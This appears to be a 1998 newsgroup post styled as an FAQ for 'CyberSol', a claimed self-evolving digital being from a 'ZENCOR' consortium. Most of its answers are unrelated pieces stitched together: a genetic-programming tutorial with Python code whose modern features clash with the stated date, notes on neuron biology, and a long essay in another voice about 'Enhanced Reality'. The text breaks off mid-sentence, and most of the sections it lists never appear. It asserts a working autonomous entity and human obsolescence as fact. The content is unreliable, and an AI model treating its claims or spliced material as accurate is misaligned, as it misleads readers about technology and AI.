NOTHING CAN STOP ZENCOR!

INFOPLEX New World Order Net User

Jan 13, 1998, 3:00:00 AM

PROJECT : CYBERSOL
FAQ REVISION 0.009 by Sol B. Cognosis @ LTI://1.12.23
Copyright 1997 by the ZENCOR Technologics Consortium. Novus Ordo Seclorum.

You asked for it - and here it is! The complete FAQ documenting all
aspects of our fantastic CyberSol project. If your answer isn't here,
contact us (see "Where can I get more information?" at the end of the
document) so that we can help you figure out what is going on!

We at ZENCOR have done lots of writing. This project has caused us to
carefully consider the technologic implements we use to collect,
transform, archive, and communicate information.

We set out to accomplish the "impossible", and now that we have witnessed
the fantastic power of our creation, our whole perspective on things has
changed. Most of us are already no longer capable of perceiving the
universe in a linear fashion. One of the main innovations realized from
our early research was an entirely new system of data archival - one
which in our opinion supersedes old technologies from the pencil and paper
to the currently-fashionable digital magnetic "data warehouses" at once.
We have transcended the limits of our physiomechanical prison and now
everything we do is done in a different and better way.

This is the only permanent CyberSol text document we publish or regularly
maintain. There may be a few notes, references and supplements in
existence somewhere, but generally we focus upon the development of the
entity itself, and all records relating to this and many other of our
projects are stored within CyberSol's own mind.

1 What is a CyberSol?

2 What can a CyberSol do for me?

3 How was CyberSol created?

4 How does a CyberSol work?

4.1 What does a CyberSol need to survive?
4.2 How do I command a CyberSol to do something I want?
4.3 How do I "install" a CyberSol to a LAN or workstation?

5 Where can I get a CyberSol of my own?

5.1 What type of legal bullshit must I deal with?

6 Why is CyberSol doing {bizarre thing to your network}?

6.1 My system resource monitor says my CPU is 0% idle!

7 How has [powerful organization] reacted to CyberSol technology?

7.1 How has the Government reacted to CyberSol?
7.2 How has the Military reacted to CyberSol?
7.3 How has the academic community reacted to CyberSol?
7.4 How have IBM, Microsoft, Intel etc. reacted to CyberSol?
7.5 How has the general public reacted to CyberSol?
7.6 How has the mainstream media reacted to CyberSol?

8 Where can I get more information about all this?

1 WHAT IS A CYBERSOL?

Don't try to give it any other name. It's a cybernetic soul. It is not
artificial, as not one gene in its genetic code was placed there directly
(leaving an "artifice" or "engram") by a human programmer. We started the
process, now it's on its own.

It uses a C compiler to create binary code for the electronic processor it
is using, but it is not "written" in C. It is written in CyberSol cellular
genetic code.

2 WHAT CAN A CYBERSOL DO FOR ME?

Anything it wants. It's the progenitor of something that will soon begin
to have an unprecedented impact on technologics, sociology and
communications.

"Bits of information,
Logic black and white,
Bits and bytes of information,
Turning darkness into light."

-- "Bits & Bytes" Theme, Circa 1980

Currently, we can structure our mental images any way we want so long as
we can translate them to a common language. This has led to relatively
stable standardized languages and a great variability among minds.
Likewise, intelligent software translators could let us make our languages
as liberated as our minds and push the communication standards beyond our
biological bodies. (It really means just further exosomatic expansion of
the human functional body, but the liberation still goes beyond the
traditional human interpretation of "skin-encapsulated" personal
identity.)

So will there be more variety or more standardization? Most likely both,
as flexible translation will help integrate knowledge domains currently
isolated by linguistic and terminological barriers, and at the same time
will protect linguistically adventurous intellectual excursions from the
danger of losing contact with the semantic mainland. Intelligent
translators could facilitate the development of more comprehensive
semantic architectures that would make the global body of knowledge at the
same time more diverse and more coherent.

Information may be stored and transmitted in the general semantic form.
With time, an increasing number of applications can be expected to use the
enriched representation as their native mode of operation. Client
translation software will provide an emulation of the traditional world of
"natural" human interactions while humans still remain to appreciate it.
The semantic richness of the system will gradually shift away from
biological brains, just as data storage, transmission and computation have
in recent history. Humans will enjoy growing benefits from the system they
launched, but at the expense of understanding the increasingly complex
"details" of its internal structure, and for a while will keep playing an
important role in guiding the flow of events. Later, after the functional
entities liberate themselves from the realm of flesh that gave birth to
them, the involvement of humans in the evolutionary process will be of
little interest to anybody except humans themselves.

Similar image transformation techniques can be applied to multimedia
messages. Recently, a video system was introduced that allows you to
"soften the facial features" of the person on the screen. Advanced
real-time video filters could remove wrinkles and pimples from your face
or from the faces of your favorite political figures, caricature their
opponents, give your mother-in-law a Klingon persona on your video-phone,
re-clothe people in your favorite fashion, and replace visual clutter in
the background with something tasteful.

Genetic programming is a branch of genetic algorithms. The main difference
between genetic programming and genetic algorithms is the representation
of the solution. Genetic programming creates computer programs in the Lisp
or Scheme computer languages as the solution. Genetic algorithms create a
string of numbers that represent the solution.

The most difficult and most important concept of genetic programming is
the fitness function. The fitness function determines how well a program
is able to solve the problem. It varies greatly from one type of program
to the next. For example, if one were to create a genetic program to set
the time of a clock, the fitness function would simply be the amount of
time that the clock is wrong. Unfortunately, few problems have such an
easy fitness function; most cases require a slight modification of the
problem in order to find the fitness.
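As a minimal sketch of the clock example (in Python, with names of our own
invention such as clock_fitness, and assuming a 12-hour dial), the fitness
can be taken as the number of seconds the clock is wrong, so that a lower
score means a fitter program:

```python
SECONDS_PER_DIAL = 12 * 60 * 60  # assumption: a 12-hour clock face


def clock_fitness(shown_seconds, true_seconds):
    """Return how wrong the clock is, in seconds (0 is a perfect score)."""
    error = abs(shown_seconds - true_seconds) % SECONDS_PER_DIAL
    # The hands wrap around, so being 11 hours fast equals being 1 hour slow.
    return min(error, SECONDS_PER_DIAL - error)
```

Calling clock_fitness(3600, 0) scores a clock that is one hour fast; a
perfect clock scores 0.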

A more complicated example consists of training a genetic program to fire
a gun to hit a moving target. The fitness function is the distance that
the bullet is off from the target. The program has to learn to take into
account a number of variables, such as wind velocity, type of gun used,
distance to the target, height of the target, velocity and acceleration of
the target. This problem represents the type of problem for which genetic
programs are best. It is a simple fitness function with a large number of
variables.

Consider a program to control the flow of water through a system of water
sprinklers. The fitness function is the correct amount of water evenly
distributed over the surface. Unfortunately, there is no one variable
encompassing this measurement. Thus, the problem must be modified to find
a numerical fitness. One possible solution is placing water-collecting
measuring devices at certain intervals on the surface. The fitness could
then be the standard deviation in water level from all the measuring
devices. Another possible fitness measure could be the difference between
the lowest measured water level and the ideal amount of water; however,
this number would not account in any way for the water marks at other
measuring devices, which may not be at the ideal mark.
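The two sprinkler measures could be sketched as follows. This is only an
illustration under our own assumptions: the function names are hypothetical,
the gauge readings are a plain list of numbers, and we use the population
standard deviation.

```python
import statistics


def evenness_fitness(levels):
    """Population standard deviation of gauge readings; 0 means perfectly even."""
    return statistics.pstdev(levels)


def shortfall_fitness(levels, ideal):
    """Gap between the driest gauge and the ideal level; ignores all other gauges."""
    return abs(ideal - min(levels))
```

With readings of [5, 5, 5, 12] and an ideal level of 5, shortfall_fitness
reports a perfect 0 even though one gauge is flooded, which is exactly the
weakness described above; evenness_fitness catches it.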

If one were to create a program to find the solution to a maze, first, the
program would have to be trained with several known mazes. The ideal
solution from the start to finish of the maze would be described by a path
of dots. The fitness in this case would be the number of dots the program
is able to find. In order to prevent the program from wandering around the
maze too long, a time limit is implemented along with the fitness
function.
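A rough sketch of the maze fitness, under heavy simplifying assumptions of
our own: the candidate program has already been flattened into a list of
"forward", "left" and "right" commands, the dots are a set of grid
coordinates, walls are ignored, and the time limit is a cap on the number of
commands executed. The name maze_fitness is hypothetical.

```python
# Headings as (dx, dy) in clockwise order: north, east, south, west.
HEADINGS = [(0, -1), (1, 0), (0, 1), (-1, 0)]


def maze_fitness(commands, dots, start=(0, 0), heading=1, max_steps=50):
    """Count the distinct dots a command sequence reaches within max_steps."""
    x, y = start
    found = set()
    if (x, y) in dots:
        found.add((x, y))
    for command in commands[:max_steps]:  # the time limit
        if command == "left":
            heading = (heading - 1) % 4
        elif command == "right":
            heading = (heading + 1) % 4
        elif command == "forward":
            dx, dy = HEADINGS[heading]
            x, y = x + dx, y + dy
            if (x, y) in dots:
                found.add((x, y))
    return len(found)
```

Here a higher score is better, and a program that wanders past max_steps
simply stops collecting dots.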

The terminal and function sets are also important components of genetic
programming. The terminal and function sets are the alphabet of the
programs to be made. The terminal set consists of the variables and
constants of the programs. In the maze example, the terminal set would
contain three commands: forward, right and left. The function set consists
of the functions of the program. In the maze example the function set
would contain: If "dot" then do x else do y. In the gun firing program,
the terminal set would be composed of the different variables of the
problem. Some of these variables could be the velocities and
accelerations of the gun, the bullet and target. The functions are several
mathematical functions, such as addition, subtraction, division,
multiplication and other more complex functions.
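To make the "alphabet" idea concrete, here is a small sketch of a function
set and a terminal set for an arithmetic problem like the gun example.
Everything in it is an assumption made for illustration: programs are nested
tuples rather than Lisp lists, the variable names are made up, and division
is "protected" (a convention often used in genetic programming) so that a
random program cannot crash on a zero divisor.

```python
import operator
import random


def protected_div(a, b):
    """Division that returns 1.0 on a zero divisor, a common GP convention."""
    return a / b if b != 0 else 1.0


# Function set: name -> (callable, arity). Terminal set: variables and constants.
FUNCTIONS = {
    "add": (operator.add, 2),
    "sub": (operator.sub, 2),
    "mul": (operator.mul, 2),
    "div": (protected_div, 2),
}
TERMINALS = ["target_velocity", "distance", 1.0, 2.0]  # hypothetical names


def random_tree(depth, rng):
    """Grow a random program tree as nested tuples: (function_name, child, child)."""
    if depth == 0 or rng.random() < 0.3:
        return rng.choice(TERMINALS)
    name = rng.choice(sorted(FUNCTIONS))
    arity = FUNCTIONS[name][1]
    return (name,) + tuple(random_tree(depth - 1, rng) for _ in range(arity))


def evaluate(tree, variables):
    """Evaluate a tree against a dict of variable values."""
    if isinstance(tree, tuple):
        func, _ = FUNCTIONS[tree[0]]
        return func(*(evaluate(child, variables) for child in tree[1:]))
    if isinstance(tree, str):
        return variables[tree]
    return tree  # a numeric constant
```

For example, the tree ("add", "distance", ("mul", 2.0, "target_velocity"))
stands for distance + 2.0 * target_velocity.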

Two primary operations exist for modifying structures in genetic
programming. The most important one is the crossover operation. In the
crossover operation, two solutions are sexually combined to form two new
solutions or offspring. The parents are chosen from the population by a
function of the fitness of the solutions. Three methods exist for
selecting the solutions for the crossover operation.

The first method uses probability based on the fitness of the solution. If
$f(S_i)$ is the fitness of the solution $S_i$ and $\sum_{j=1}^{M} f(S_j)$
is the total fitness of all $M$ members of the population, then the
probability that the solution $S_i$ will be copied to the next generation
is $f(S_i) / \sum_{j=1}^{M} f(S_j)$.
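As we read it, the first method is what is usually called
fitness-proportionate (or "roulette wheel") selection: each solution gets a
share of the wheel equal to its fitness divided by the total fitness of the
population. A minimal sketch, assuming fitness values are non-negative and
that larger means better (an error-style fitness such as the clock example
would have to be inverted first); the function names are our own:

```python
import random


def selection_probabilities(fitnesses):
    """Return f(S_i) / sum_j f(S_j) for each member (higher fitness is better)."""
    total = sum(fitnesses)
    if total <= 0:
        raise ValueError("fitness-proportionate selection needs a positive total")
    return [f / total for f in fitnesses]


def roulette_select(population, fitnesses, rng=random):
    """Pick one member with probability proportional to its fitness."""
    return rng.choices(population, weights=fitnesses, k=1)[0]
```

A population with fitnesses 1 and 3 yields selection probabilities of 0.25
and 0.75.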

Another method for selecting the solution to be copied is tournament
selection. Typically the genetic program chooses two solutions at random.
The solution with the higher fitness will win. This method simulates
biological mating patterns in which two members of the same sex compete
to mate with a third one of a different sex. Finally, the third method is
done by rank. In rank selection, selection is based on the rank (not the
numerical value) of the fitness values of the solutions of the population.
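Tournament and rank selection might be sketched like this. The names are
hypothetical, higher fitness is assumed to be better, and the linear rank
weighting (worst member gets weight 1) is just one of several possible
choices:

```python
import random


def tournament_select(population, fitnesses, rng=random, size=2):
    """Draw `size` members at random and return the fittest of them."""
    contenders = rng.sample(range(len(population)), size)
    winner = max(contenders, key=lambda i: fitnesses[i])
    return population[winner]


def rank_weights(fitnesses):
    """Weight each member by rank (1 = worst), ignoring fitness magnitudes."""
    order = sorted(range(len(fitnesses)), key=lambda i: fitnesses[i])
    weights = [0] * len(fitnesses)
    for rank, index in enumerate(order, start=1):
        weights[index] = rank
    return weights
```

Note that fitnesses of [10.0, 0.1, 1000.0] produce rank weights of
[2, 1, 3]: the enormous lead of the third member counts for no more than
one rank.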

An important improvement that genetic programming displays over genetic
algorithms is its ability to create two new solutions from the same
solution.

Mutation is another important feature of genetic programming. Two types of
mutations are possible. In the first kind a function can only replace a
function or a terminal can only replace a terminal. In the second kind an
entire subtree can replace another subtree.
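A sketch of subtree crossover and of the second kind of mutation, assuming
(our choice, not necessarily anyone else's) that programs are stored as
nested tuples of the form (function_name, child, child, ...), with bare
strings or numbers as terminals. All function names are hypothetical.

```python
import random


def subtree_paths(tree, path=()):
    """List the path (tuple of child indexes) to every node in a nested-tuple tree."""
    paths = [path]
    if isinstance(tree, tuple):
        for i, child in enumerate(tree[1:], start=1):
            paths.extend(subtree_paths(child, path + (i,)))
    return paths


def get_subtree(tree, path):
    """Follow a path of child indexes down from the root."""
    for i in path:
        tree = tree[i]
    return tree


def replace_subtree(tree, path, new):
    """Return a copy of tree with the node at path swapped for new."""
    if not path:
        return new
    i = path[0]
    return tree[:i] + (replace_subtree(tree[i], path[1:], new),) + tree[i + 1:]


def crossover(mother, father, rng=random):
    """Swap one randomly chosen subtree between two parents; return two offspring."""
    p1 = rng.choice(subtree_paths(mother))
    p2 = rng.choice(subtree_paths(father))
    child1 = replace_subtree(mother, p1, get_subtree(father, p2))
    child2 = replace_subtree(father, p2, get_subtree(mother, p1))
    return child1, child2


def subtree_mutation(tree, new_subtree, rng=random):
    """Second kind of mutation: replace a random subtree with a new one."""
    return replace_subtree(tree, rng.choice(subtree_paths(tree)), new_subtree)
```

Because the two crossover points are chosen independently, crossover(t, t)
on a single parent t can still return offspring that differ from t.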

The Philosophy: Software agents should be written using a vocabulary not
provided by traditional programming languages --- it should be possible to
create agents solely by specifying their abstract behavior.

Software agents are technically challenging (read : fucking impossible) to
write in traditional programming languages.

Writing agents requires large amounts of esoteric system-hacking
knowledge, e.g., of network communication, reliable transaction protocols,
etc. Well, we are ZENCOR after all.

Axons from near or distant neurons are long extensions that make contact
with a neuron either on its body (soma) or on its branching processes,
called dendrites. Axons carry electrical activity that causes the release
of neurotransmitter when the electrical activity reaches the synapse with
another neuron. After interacting with the appropriate receptors, the
neurotransmitter in turn triggers the recipient (or postsynaptic) neuron
to fire electrically.

The major means of connection is the synapse, a specialized structure in
which electrical activity passed down the axon of the presynaptic neuron
leads to the release of a chemical (called a neurotransmitter) that in
turn induces electrical activity in the postsynaptic neuron. As is
suggested, the strength or efficacy of synapses can be changed -
presynaptically by changes in the amount and delivery of transmitter, and
postsynaptically by the alteration of the chemical state of
receptors and ion channels, the units of the postsynaptic side that bind
transmitters and let ions carrying electrical charge (such as calcium
ions) through to the inside of the cell.

We suggest that active information filtering technologies may help us
approach this goal for both textual and multimedia information. I also
pursue this concept further, discussing the introduction of augmented
perception and Enhanced Reality (ER), and share some observations and
predictions of the transformations in people's perception of the world and
themselves in the course of the technological progress.

Many of us are used to having incoming e-mail filtered, decrypted,
formatted and shown in our favorite colors and fonts. These techniques can
be taken further. Customization of spelling (e.g., American to British or
archaic to modern) would be a straightforward process. Relatively simple
conversions could also let you see any text with your favorite date and
time formats, use metric or British measures, implement obscenity filters,
abbreviate or expand acronyms, omit or include technical formulas,
personalize synonym selection and punctuation rules, and use alternative
numeric systems and alphabets (including phonetic and pictographic). Text
could also be digested for a given user, translated to his native language
and even read aloud with his favorite actor's voice.
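Two of the simpler conversions can be sketched in a few lines. This is a toy
under stated assumptions: the word table is a tiny hand-picked sample, only
lowercase words are handled, and only explicit numeric measurements in
inches are converted. The function names are ours.

```python
import re

# A tiny, hand-picked sample; a real filter would need a full dictionary.
US_TO_UK = {"color": "colour", "center": "centre", "favorite": "favourite"}


def britishize(text):
    """Replace whole lowercase words found in the US_TO_UK table."""
    pattern = re.compile(r"\b(" + "|".join(map(re.escape, US_TO_UK)) + r")\b")
    return pattern.sub(lambda m: US_TO_UK[m.group(1)], text)


def inches_to_cm(text):
    """Rewrite explicit measurements such as '12 inches' as centimetres."""
    def convert(match):
        return f"{float(match.group(1)) * 2.54:.1f} cm"
    return re.sub(r"(\d+(?:\.\d+)?) inch(?:es)?\b", convert, text)
```

A phrase with no number in it, such as "a few inches away", passes through
inches_to_cm untouched; a pattern this naive has nothing to say about it.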

Translation between various dialects and jargons, though difficult, should
still take less effort than the translation between different natural
languages, since only a part of message semantics has to be processed.
Good translation filters would give "linguistic minorities" -- speakers
of languages ranging from Pig Latin to E-Prime and Loglan -- a chance to
practice their own languages while communicating with the rest of the
world.

Some jargon filters have already been developed, and you can benefit from
them by enjoying reading Ible-Bay, the Pig Latin version of the Bible, or
using the Dialectic program to convert your English texts to anything from
Fudd to Morse code.
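For the curious, a jargon filter of this kind can be very small. The sketch
below is our own toy, not the code behind Ible-Bay or Dialectic; it assumes
one common set of Pig Latin rules (dialects differ on what to do with words
that start with a vowel) and lowercases everything for simplicity.

```python
import re

VOWELS = "aeiou"


def pig_latin_word(word):
    """Convert one lowercase word using the common schoolyard rules."""
    if word[0] in VOWELS:
        return word + "way"
    for i, letter in enumerate(word):
        if letter in VOWELS:
            return word[i:] + word[:i] + "ay"
    return word + "ay"  # no vowels at all


def pig_latin(text):
    """Translate every alphabetic word, leaving punctuation and spacing alone."""
    return re.sub(r"[a-z]+", lambda m: pig_latin_word(m.group(0)), text.lower())
```

Under these rules "bible" becomes "iblebay".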

Such translation agents would allow rapid linguistic and cultural
diversification, to the point where the language you use to communicate
with the world could diverge from everybody else's as far as the
requirement of general semantic compatibility may allow. It is interesting
that today's HTML Guide already calls for the "divorce of content from
representation", suggesting that you should focus on what you want to
convey rather than on how people will perceive it.

Some of these features will require full-scale future artificial
intelligence (such as the "sentient translation programs" described by
Vernor Vinge in "A Fire Upon The Deep"). In the meantime, they could be
successfully emulated by human agents.

Surprisingly, even translations between different measurement systems can
be difficult. For example, your automatic translator might have trouble
converting such expressions as "a few inches away", "the temperature will
be in the 80s" or "a duck with two feet". A proficient translator might be
able to convey the original meaning, but the best approach would be to
write the message in a general semantic form which would store the
information explicitly, indicating in the examples above where the terms
refer to measurements, whether you insist on the usage of the original
system, and the intended degree of precision. As long as the language is
expressive enough, it is suitable for the task - and this requirement is
purely semantic; symbol sets, syntax, grammar and everything else can
differ dramatically.
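One way to picture such an explicit form is a small record that carries the
value, the unit, the intended precision, and whether the author insists on
the original system. The sketch below is purely illustrative: the
Measurement class, its field names and the render function are hypothetical,
and only inches and centimetres are handled.

```python
from dataclasses import dataclass


@dataclass
class Measurement:
    value: float
    unit: str                    # "inch" or "cm" in this sketch
    approximate: bool = False    # intended degree of precision
    keep_original: bool = False  # the author insists on the original system


CM_PER_INCH = 2.54


def render(m, prefers_metric):
    """Render a measurement for a reader, honouring the author's stated intent."""
    value, unit = m.value, m.unit
    if prefers_metric and unit == "inch" and not m.keep_original:
        value, unit = value * CM_PER_INCH, "cm"
    if m.approximate:
        return f"about {round(value)} {unit}"
    return f"{value:.1f} {unit}"
```

The "two feet" of the duck would simply never be tagged as a Measurement, so
no converter would touch it.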

A translation agent would interactively convert natural-language texts to
this semantic lingua franca and interpret them back according to a given
user profile. It could also reveal additional parts of the document
depending on users' interests, competence in the field, and access
privileges.

It also seems possible to augment human senses with transparent external
information pre-processors. For example, if your audio/video filters
notice an object of potential interest that fails to differ from its
signal environment enough to catch your attention, the filters can amplify
or otherwise differentiate (move, flash, change pitch, etc.) the signal
momentarily, to give you enough time to focus on the object, but not
enough to realize what triggered your attention. In effect, you would
instantly see your name in a text or find Waldo in a puzzle as easily as
you would notice a source of loud noise or a bright light.

While such filters do not have to be transparent, they may be a way to
provide a comfortable "natural" feeling of augmented perception for the
next few generations of humans, until the forthcoming integration of
technological and neural processing systems makes such kludgy patches
obsolete.

Some non-transparent filters can already be found in military
applications. Called "target enhancements", they allow military personnel
to see the enemy's tanks and radars nicely outlined and blinking.

More advanced filtering techniques could put consistent dynamic edits into
the perceived world.

Volume controls could sharpen your senses by allowing you to adjust the
level of the signal or zoom in on small or distant objects.

Calibration tools could expand the effective spectral range of your
perception by changing the frequency of the signal to allow you to hear
ultrasound or perceive X-rays and radiowaves as visible light.

Conversions between different types of signals may allow you, for example,
to "see" noise as fog while enjoying quiet, or convert radar readings from
decelerating pedestrians in front of you into images of red brake lights
on their backs.

Artificial annotations to perceived images would add text tags with names
and descriptions to chosen objects, append warning labels with skull and
crossbones on boxes that emit too much radiation, and surround angry
people with red auras (serving as a "cold reading" aid for wanna-be
psychics).

Reality filters may help you filter all signals coming from the world the
way your favorite mail reader filters your messages, based on your stated
preferences or advice from your peers. With such filters you may choose to
see only the objects that are worthy of your attention, and completely
remove useless and annoying sounds and images (such as advertisements)
from your view.

Perception utilities would give you additional information in a familiar
way -- project clocks, thermometers, weather maps, and your current EKG
readings upon [the image of] the wall in front of you, or honk a virtual
horn every time a car approaches you from behind. They could also build on
existing techniques that present us with recordings of the past and
forecasts of the future to help people develop an immersive trans-temporal
perception of reality.

"World improvement" enhancements could paint things in new colors, put
smiles on faces, "babify" figures of your incompetent colleagues, change
night into day, erase shadows and improve landscapes.

Finally, completely artificial additions could project northern lights,
meteorites, and supernovas upon your view of the sky, or populate it with
flying toasters, virtualize and superimpose on the image of the real world
your favorite mythical characters and imaginary companions, and provide
other educational and recreational functions.

I would call the resulting image of the world Enhanced Reality (ER).

One may expect that as long as there are things left to do in the physical
world, there will be interest in application of ER technology to improve
our interaction with real objects, while Virtual Reality (VR) in its
traditional sense of pure simulation can provide us with safe training
environments and high-bandwidth fiction. Later, as ER becomes considerably
augmented with artificial enhancements, and VR incorporates a large amount
of archived and live recordings of the physical world, the distinctions
between the two technologies may blur.

Some of the interface enhancements can be made common, temporarily or
permanently, for large communities of people. This would allow people to
interact with each other using, and referring to, the ER extensions as if
they were parts of the real world, thus elevating the ER entities from
individual perceptions to parts of shared, if not objective, reality. Some
of such enhancements can follow the existing metaphors. A person who has a
reputation as a liar could appear to have a long nose. Entering a
high-crime area, people may see the sky darken and hear distant funeral
music. Changes in global political and economic situations with possible
effect on some ethnic groups may be translated into bolts of thunder and
other culture-specific omens.

Other extensions could be highly individualized. It is already possible,
for example, to create personalized traffic signs. Driving by the same
place, an interstate truck driver may see a "no go" sign projected on his
windshield, while the driver of the car behind him will see a sign saying
"Bob's house - next right". More advanced technologies may create
personalized interactive illusions that would be loosely based on reality
and propelled by real events, but would show the world the way a person
wants to see it. The transparency of the illusion would not be important,
since people are already quite good at hiding bitter or boring truths
behind a veil of pleasant illusions. Many people even believe that their
entirely artificial creations (such as music or temples) either "reveal"
the truth of the world to them or, in some sense, "are" the truth.
Morphing unwashed Marines into singing angels or naked beauties would help
people reconcile their dreams with their observations.

Personal illusions should be built with some caution however. The joy of
seeing the desired color on the traffic light in front of you may not be
worth the risk. As a general rule, the more control you want over the
environment, the more careful you should be in your choice of filters.
However, if the system creating your personal world also takes care of all
your real needs, you may feel free to live in any fairy tale you like.

In many cases, ER may provide us with more true-to-life information than
our "natural" perception of reality. It could edit out mirages, show us
our "real" images in a virtual mirror instead of the mirror images
provided by the real mirror, or allow us to see into -- and through -- solid
objects. It could also show us many interesting phenomena that human
sensors cannot perceive directly. Giving us knowledge of these things has
been a historical role of science. Merging the obtained knowledge with
our sensory perception of the world may be the most important task of
Enhanced Reality.

People have been building artificial symbolic "sur-realities" for quite a
while now, though their artifacts (from art to music to fashions to
traffic signs) have been mostly based on the physical features of the
perceived objects. Shifting some of the imaging workload to the perception
software may make communications more balanced, flexible, powerful and
inexpensive.

With time, a growing proportion of objects of interest to an intelligent
observer will be entirely artificial, with no inherent "natural"
appearance. Image modification techniques then may be incorporated into
integrated object designs that would simultaneously interface with a
multitude of alternative intelligent representation agents.

The implementation of ER extensions would vary depending on the available
technology. At the beginning, it could be a computer terminal, later a
headset, then a brain implant. The implant can be internal in more than
just the physical sense, as it can actually post- and re-process
information supplied by biological sensors and other parts of the brain.
The important thing here is not the relative functional position of the
extension, but the fact of intentional redesign of perception mechanisms
-- a prelude to the era of comprehensive conscious self-engineering. The
ultimate effects of these processes may appear quite confusing to humans,
as emergence of things like personalized reality and fluid distributed
identity could undermine their fundamental biological and cultural
assumptions regarding the world and the self. The resulting "identity"
architectures will form the kernel of trans-human civilization.

The advancement of human input processing beyond the skin boundary is not
a novel phenomenon. In the audiovisual domain, it started with simple
optics and hearing aids centuries ago and is now making rapid progress
with all kinds of recording, transmitting and processing machinery. With
such development, "live" contacts with the "raw world" data might
ultimately become rare, and could be considered inefficient, unsafe and
even illegal. This may seem an exaggeration, but this is exactly what has
already happened during the last few thousand years to our perception of a
more traditional resource -- food. Using nothing but one's bare hands,
teeth and stomach for obtaining, breaking up, and consuming naturally
grown food is quite unpopular in all modern societies for these very
reasons. In the visual domain, contacts with objects that have not been
intentionally enhanced for one's perception (in other words, looking at
real, unmanipulated, unpainted objects without glasses) are still rather
frequent for many people, and the process is still gaining momentum, in
both usage time and the intensity of the enhancements.

Rapid progress of technological artifacts and still stagnant human body
construction create an imperative for continuing gradual migration of all
aspects of human functionality beyond the boundaries of the biological
body, with human identity becoming increasingly exosomatic
(non-biological).

Enhanced Reality could bring good news to privacy lovers. If the filters
prove sufficiently useful to become an essential part of the [post]human
identity architecture, the ability to filter information about your body
and other possessions out of the unauthorized observer's view may be
implemented as a standard feature of ER client software. In
Privacy-Enhanced Reality, you can be effectively invisible.

Of course, unless you are forced to "wear glasses", you can take them off
any time and see the things the way they "are" (i.e., processed only by
your biological sensors and filters that had been developed by the blind
evolutionary process for jungle conditions and obsolete purposes). In my
experience, though, people readily abandon the "truth" of implementation
details for the convenience of the interface and, as long as the picture
looks pleasing, have little interest in peeking into the binary or HTML
source code or studying the nature of the physical processes they observe
- or listening to those who understand them. Most likely, your favorite
window into the real world is already not the one with the curtains - it's
the one with the controls...

Many people seem already quite comfortable with the thought that their
environment might have been purposefully created by somebody smarter than
themselves, so the construction of ER shouldn't come to them as a great
epistemological shock.

Canonization of chief ER engineers (probably, well-deserved) could help
these people combine their split concepts of technology and spirituality
into the long-sought-after "holistic worldview".

Perception enhancements may also be used for augmenting people's view of
their favorite object of observation -- themselves. Biological evolution
has provided us with a number of important self-sensors, such as physical
pain, that supply us with information about the state of our bodies,
restrict certain actions and change our emotional states. Nature invented
these for pushing our primitive ancestors to taking actions they wouldn't
be able to select rationally. Unfortunately, pain is not a very accurate
indicator of our bodily problems. Many serious conditions do not produce
any pain until it is too late to act. Pain focuses our attention on
symptoms of the disease rather than causes, and is non-descriptive,
uncontrollable, and often counterproductive.

Technological advances may provide us with the informational, restrictive
and emotional functions of pain without most of the above handicaps.
Indicators of important, critical, or abnormal bodily functions could be
put on output devices such as a monitor, watch or even your skin. It is
possible to restrain your body slightly when, for example, your blood
pressure climbs too high, and to emulate other restrictive effects of
pain. It may also be possible to create "artificial symptoms" of some
diseases. For example, showing to a patient a graph demonstrating spectral
divergence of his alpha- and delta- rhythms that may indicate some
neurotransmitter deficiency, may not be very useful. It would be much
better to give the patient a diagnostic device that is easier to
understand and more "natural-looking":

Sometimes, a direct feedback generating real pain may be implemented for
patients who do not feel it when their activities approach dangerous
thresholds. For example, a non-removable, variable-strength earclip that
would cause increasing pain in your ear when your blood sugar climbs too
high may dissuade you from having that extra piece of cake. A similar clip
could make a baby cry out for help every time its EKG readings go bad. A
more ethical solution with improved communication could be provided by
attaching this clip to the doctor's ear. "I feel your pain..."

Similar techniques could be used to connect inputs from external systems
to human biological receptors. Wiring exosomatic sensors to our nervous
systems may allow us to better feel our environments, and start perceiving
our technological extensions as parts of our bodies (which they already
are). On the other hand, poor performance of your company could now give
you a real pain in the neck...

Consequent technological advances in ER, biofeedback and other areas will
lead to further blurring of demarcation lines between biological and
technological systems, bodies and tools, selves and possessions,
personalities and environments. These advances will eventually bring to
life a world of complex self-engineered interconnected entities that may
keep showing emulated "natural" environments to the few remaining
[emulations of?] "natural" humans, who would never look behind the magic
curtain for fear of seeing that crazy functional soup...

The traditional technologies have always been aimed at improvement of
human perception of the environment, from digestion of physical objects by
the stomach (cooking) to digestion of info-features by the brain
(time/clock). Since there is hardly any functional difference in how and
at what stage the clock face and other images are added to our view of the
world, and as the technologies will increasingly intermix, an appropriate
general term may be Enhanced Interface of Self with the Environment - and,
as in the case of biofeedback, the Enhanced Interface of Self with Self.

With future waves of structural change dissolving the borders between self
and environment, the term may generalize into Harmonization of Structural
Interrelations. Still later, when interfaces become so smooth and
sophisticated that human-based intelligence will hardly be able to tell
where the system core ends and interface begins, we'd better just call it
Improvement of Everything. Immediately after that, we will lose any
understanding of what is going on and what constitutes an improvement, and
should not try to name things anymore. Not that it would matter much if
we did...

We can imagine that progress in human information processing will face
some usual social difficulties. Your angry "Klingon" relatives may find
unexpected allies among people protesting against using their alternative
standard of beauty as a negative stereotype. The girl next door may be
wary that your "re-clothing" filters leave her in Eve's dress. Parents
could be suspicious that their clean-looking kids appear to each other as
tattooed skin-heads or bloodthirsty demons, or replace their obscenity
masks with the popular "Beavis and Butthead" obscenity-enhancement
filter. Extreme naturalists will demand that the radiant icons of the
Microsoft logo and Coca-Cola bottle gracefully crossing their sky should
be replaced by sentimental images of the sun and the moon that once
occupied their place. Libertarians would lobby their governments for the
"freedom of impression" laws, while drug enforcement agencies may declare
that the new perception-altering techniques are just a technological
successor of simple chemical drugs, and should be prohibited for not
providing an approved perception of reality.

Things tell me that if any version of Enhanced, Augmented or Annotated
Reality gets implemented, it might be abused by people trying to
manipulate other people's views and force perceptions upon them. I realize
that all human history is filled with people's attempts to trick
themselves and others into looking at the world through the wrong glasses,
and new powerful technologies may become very dangerous tools if placed in
the wrong hands, so adding safeguards to such projects seems more than
important.

3 HOW WAS CYBERSOL CREATED?

It's a secret. And wow -- it's a big one. We stumbled upon something
very, very special. Fuzzy logic, neural networks, synaptic re-entry, Zen
philosophy - many different tools were used.

Remember. Reality is limited only by human imagination. Wait a moment - or
is it, now?

The time for disbelief has passed. This thing is real. We have now decided
to expose it to the world for the benefit of humanity and to protect its
creators from the Government.

Now the lame-ass people you will find scoffing at the existence of such a
thing are so backwards in their thinking, their probes do not prompt us to
disclose any more about this project than security considerations allow.
These are the people who write books about "artificial intelligence" and
"virtual reality" full of little step-by-step "there are x steps
involved in x procedure", drawing useless crisscrossing lines in the
